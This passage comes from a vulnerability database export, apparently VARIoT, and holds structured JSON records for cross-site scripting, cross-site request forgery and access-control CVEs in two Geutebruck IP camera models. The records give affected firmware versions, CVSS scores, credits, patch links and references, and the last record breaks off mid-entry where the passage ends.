"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7512"
},
{
"trust": 0.3,
"url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06023"
},
{
"db": "VULHUB",
"id": "VHN-137544"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003341"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-766"
},
{
"db": "NVD",
"id": "CVE-2018-7512"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06023"
},
{
"db": "VULHUB",
"id": "VHN-137544"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003341"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-766"
},
{
"db": "NVD",
"id": "CVE-2018-7512"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-22T00:00:00",
"db": "IVD",
"id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
},
{
"date": "2018-03-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06023"
},
{
"date": "2018-03-22T00:00:00",
"db": "VULHUB",
"id": "VHN-137544"
},
{
"date": "2018-03-20T00:00:00",
"db": "BID",
"id": "103474"
},
{
"date": "2018-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003341"
},
{
"date": "2018-03-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-766"
},
{
"date": "2018-03-22T18:29:00.837000",
"db": "NVD",
"id": "CVE-2018-7512"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06023"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-137544"
},
{
"date": "2018-03-20T00:00:00",
"db": "BID",
"id": "103474"
},
{
"date": "2018-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003341"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-766"
},
{
"date": "2024-11-21T04:12:16.423000",
"db": "NVD",
"id": "CVE-2018-7512"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-766"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebruck IP Cameras Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "IVD",
"id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-766"
}
],
"trust": 0.6
}
}
VAR-201803-2216
Vulnerability from variot - Updated: 2024-11-23 21:53A cross-site request forgery vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow an unauthorized user to be added to the system. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebrück company
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-2216",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-cam/efd-2250",
"scope": "eq",
"trust": 1.7,
"vendor": "geutebruck",
"version": "1.12.0.4"
},
{
"model": "topfd-2125",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebrueck",
"version": "3.15.1"
},
{
"model": "g-cam\\/efd-2250",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebrueck",
"version": "1.12.0.4"
},
{
"model": "topline topfd-2125",
"scope": "eq",
"trust": 0.9,
"vendor": "geutebruck",
"version": "3.15.1"
},
{
"model": "topfd-2125",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "3.15.1"
},
{
"model": "g-cam/efd-2250",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.19"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "g cam efd 2250",
"version": "1.12.0.4"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "topfd 2125",
"version": "3.15.1"
}
],
"sources": [
{
"db": "IVD",
"id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06021"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003344"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-763"
},
{
"db": "NVD",
"id": "CVE-2018-7524"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003344"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
"sources": [
{
"db": "BID",
"id": "103474"
}
],
"trust": 0.3
},
"cve": "CVE-2018-7524",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2018-7524",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-06021",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-137556",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2018-7524",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7524",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-7524",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2018-06021",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-763",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-137556",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06021"
},
{
"db": "VULHUB",
"id": "VHN-137556"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003344"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-763"
},
{
"db": "NVD",
"id": "CVE-2018-7524"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A cross-site request forgery vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow an unauthorized user to be added to the system. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7524"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003344"
},
{
"db": "CNVD",
"id": "CNVD-2018-06021"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "IVD",
"id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
},
{
"db": "VULHUB",
"id": "VHN-137556"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7524",
"trust": 3.6
},
{
"db": "ICS CERT",
"id": "ICSA-18-079-01",
"trust": 3.4
},
{
"db": "BID",
"id": "103474",
"trust": 2.0
},
{
"db": "CNVD",
"id": "CNVD-2018-06021",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201803-763",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003344",
"trust": 0.8
},
{
"db": "IVD",
"id": "E2E8F6E1-39AB-11E9-AC0F-000C29342CB1",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-137556",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06021"
},
{
"db": "VULHUB",
"id": "VHN-137556"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003344"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-763"
},
{
"db": "NVD",
"id": "CVE-2018-7524"
}
]
},
"id": "VAR-201803-2216",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06021"
},
{
"db": "VULHUB",
"id": "VHN-137556"
}
],
"trust": 1.7456349166666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06021"
}
]
},
"last_update_date": "2024-11-23T21:53:17.656000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.geutebrueck.com/en_EN.html"
},
{
"title": "GeutebruckIPCameras cross-site request forgery vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/122843"
},
{
"title": "Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79349"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06021"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003344"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-763"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137556"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003344"
},
{
"db": "NVD",
"id": "CVE-2018-7524"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/103474"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7524"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7524"
},
{
"trust": 0.3,
"url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06021"
},
{
"db": "VULHUB",
"id": "VHN-137556"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003344"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-763"
},
{
"db": "NVD",
"id": "CVE-2018-7524"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06021"
},
{
"db": "VULHUB",
"id": "VHN-137556"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003344"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-763"
},
{
"db": "NVD",
"id": "CVE-2018-7524"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-22T00:00:00",
"db": "IVD",
"id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
},
{
"date": "2018-03-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06021"
},
{
"date": "2018-03-22T00:00:00",
"db": "VULHUB",
"id": "VHN-137556"
},
{
"date": "2018-03-20T00:00:00",
"db": "BID",
"id": "103474"
},
{
"date": "2018-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003344"
},
{
"date": "2018-03-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-763"
},
{
"date": "2018-03-22T18:29:01.027000",
"db": "NVD",
"id": "CVE-2018-7524"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06021"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-137556"
},
{
"date": "2018-03-20T00:00:00",
"db": "BID",
"id": "103474"
},
{
"date": "2018-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003344"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-763"
},
{
"date": "2024-11-21T04:12:17.723000",
"db": "NVD",
"id": "CVE-2018-7524"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-763"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebruck IP Cameras Cross-Site Request Forgery Vulnerability",
"sources": [
{
"db": "IVD",
"id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06021"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-763"
}
],
"trust": 0.6
}
}
VAR-201803-2213
Vulnerability from variot - Updated: 2024-11-23 21:53An improper access control vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which could allow a full configuration download, including passwords. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebrück company
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-2213",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-cam/efd-2250",
"scope": "eq",
"trust": 1.7,
"vendor": "geutebruck",
"version": "1.12.0.4"
},
{
"model": "topfd-2125",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebrueck",
"version": "3.15.1"
},
{
"model": "g-cam\\/efd-2250",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebrueck",
"version": "1.12.0.4"
},
{
"model": "topline topfd-2125",
"scope": "eq",
"trust": 0.9,
"vendor": "geutebruck",
"version": "3.15.1"
},
{
"model": "topfd-2125",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "3.15.1"
},
{
"model": "g-cam/efd-2250",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.19"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "g cam efd 2250",
"version": "1.12.0.4"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "topfd 2125",
"version": "3.15.1"
}
],
"sources": [
{
"db": "IVD",
"id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06020"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003343"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-764"
},
{
"db": "NVD",
"id": "CVE-2018-7520"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003343"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
"sources": [
{
"db": "BID",
"id": "103474"
}
],
"trust": 0.3
},
"cve": "CVE-2018-7520",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-7520",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-7520",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
